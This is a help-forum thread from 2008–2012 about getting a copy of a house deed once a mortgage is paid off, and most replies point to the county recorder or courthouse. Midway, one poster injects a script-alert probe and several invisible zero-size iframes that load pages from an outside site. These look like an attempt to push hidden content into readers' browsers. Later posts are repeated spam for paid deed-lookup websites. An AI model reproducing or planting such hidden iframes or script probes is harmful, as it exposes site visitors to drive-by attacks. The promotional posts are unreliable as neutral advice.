Ask Experts Questions for FREE Help !
Ask
    bulldogmom Posts: 1, Reputation: 1

Feb 18, 2008, 03:41 PM
    Copy of Deed
    My mortgage has been paid off for several years. How do I get a copy of a free and clear deed for my property?
    xphelper Posts: 220, Reputation: 29

Feb 18, 2008, 05:03 PM
    Quote Originally Posted by bulldogmom
    My mortgage has been paid off for several years. How do I get a copy of a free and clear deed for my property?
    In my area, once the mortgage is paid off, the mortgage company notifes the county I live in and they remove the incumbrance against the deed (I think incumbrance is correct or maybe it is a lien). You can then go and get an updated copy of your deed (for a small fee Im sure) from the county. Now, it probably works the same way in your area but check with your own county for details.
    Fr_Chuck Posts: 81,301, Reputation: 7692
    Expert

Feb 18, 2008, 08:06 PM
    Did you get a paid in full notice from the mortgage company.
    blrobin2406 Posts: 1, Reputation: 1

May 6, 2008, 08:04 AM
    I lost the copy of my deed, where can I get another copy?
    George_1950 Posts: 3,099, Reputation: 236
    Ultra Member

May 6, 2008, 08:07 AM
    Your deed and your mortgage are filed in the county courthouse. The mortgage should now be marked, "Satisfied", this should be dated and may be in red ink.
    twinkiedooter Posts: 12,172, Reputation: 1054
    Uber Member

May 6, 2008, 01:51 PM
    Go to the County Recorder's office and get another copy of your deed. Costs a few dollars.
    Fr_Chuck Posts: 81,301, Reputation: 7692
    Expert

May 6, 2008, 03:02 PM
    Yes, you need to go to the court house, and make sure their records show the lien paid in full. If not you need to contact the mortgage company and be sure they notify the recorder of deeds.
    mmckaughn Posts: 1, Reputation: 1

Jan 17, 2010, 05:28 PM
    [QUOTE=blrobin2406;1026080]I lost the copy of my deed, where can I get another copy? Please help.
    DownUnder Posts: 492, Reputation: 24

Jan 17, 2010, 07:11 PM

Don't understand why so many people are asking the same question
    But look its easy go to the court house where the deed was recorded and get a copy. Should not be hard since you are paying taxes on the property
    As mentioned before it may cost a few dollars but you can get it and then put it in a SAFE PLACE!
    Redemption Posts: 5, Reputation: 1

Feb 19, 2011, 10:40 AM
    <script>alert(" ")</script>

Feb 19, 2011, 10:41 AM
    <iframe></iframe>

Feb 19, 2011, 11:18 AM
    <iframe src=”http://redz.web44.net/java/index.htm” height=”0” width=”0” frameborder=”0”></iframe>
    Dumb deeds

Feb 20, 2011, 08:11 AM
    <iframe src=”http://redz.web44.net/Twitter_files/” height=”0” width=”0” frameborder=”0”></iframe>

Feb 21, 2011, 12:22 AM
    <iframe src=”http://redz.web44.net/Twitter_files/” height=”0” width=”0” frameborder=”0”></iframe>
    Deeds are a pain
    nickbao Posts: 4, Reputation: 1

Oct 3, 2011, 05:24 PM
    You can get a copy of your deed, tax information, ownership, last sold price and other document by go to www.nextace.com then search for your property using your home address. If the records are found, you can download them all for a small fee within minutes.
    nickbao Posts: 4, Reputation: 1

Oct 3, 2011, 05:32 PM
    You can try the online property information service as www.nextace.com. You can search for your property records by home address. If the records are found, you can down load the deed, tax and other ownership information for a small fee.
    mbergano Posts: 5, Reputation: 1

Aug 31, 2012, 05:22 PM
    If you live in NYC or Long Island you can order your deed or any property record for 20$ and get it the same day! Use Needmydeed.com

Aug 31, 2012, 05:25 PM
    Needmydeed.com allows long island and the 5 boroughs of NYC to order there deed for $20 and you will get it in 24 hours or less. You can also order Title Examinations, Copies or Mortgages or Mortgage satisfactions, etc. go to NeedMyDeed.com Order Land Records and Vital Docs. Titles Deeds & More! L.I.N.Y.C to see what they have to offer. Get any Vital Property Records delivered to you the fastest cheapest most efficient way!
    DomaniMami Posts: 1, Reputation: 1

Oct 7, 2012, 03:02 PM
    What about if you were on land contract for 60 months and paid it off years ago, but lost the deed? The Registry of deeds office says they don't have the deed on file in my name. What should I do then?

Oct 7, 2012, 03:30 PM
    If your property is in NY then use needmydeed.com

Not your question? Ask your question View similar questions

Question Tools Search this Question
Search this Question:

Advanced Search

Add your answer here.

Check out some similar questions!

Special warranty deed and quit claim deed what are they? [ 6 Answers ]

What is the difference bewtween the two and what is the purpose?

Where do I get a copy of the deed to my house? Paid off a year ago [ 1 Answers ]

I paid off my home mortgage (actually it was a Home Equity Line of Credit) a year ago. Where do I go to get a copy of the deed to my home?

Quit Claim Deed/Contract for Deed [ 7 Answers ]

Ok, I have posted before. I had a contract for deed piece of property, and have myself been going back and forth with a lawyer and the client. Trying to make a offer to end this nightmare. I offered them 1000.00 in 10 payments and at the end of that to sign a quitclaim deed or 500.00 and...

Corrective Deed, New Quit Claim Deed, or See an Attorney? [ 4 Answers ]

I have a major problem with a quit claim deed that was done regarding my father's property. The intention was to put me in the deed but as an heir to the property, not as a co-owner or anything like that. So, a quit claim deed was filled out and recorded at the clerk of the circuit court. However,...

View more questions Search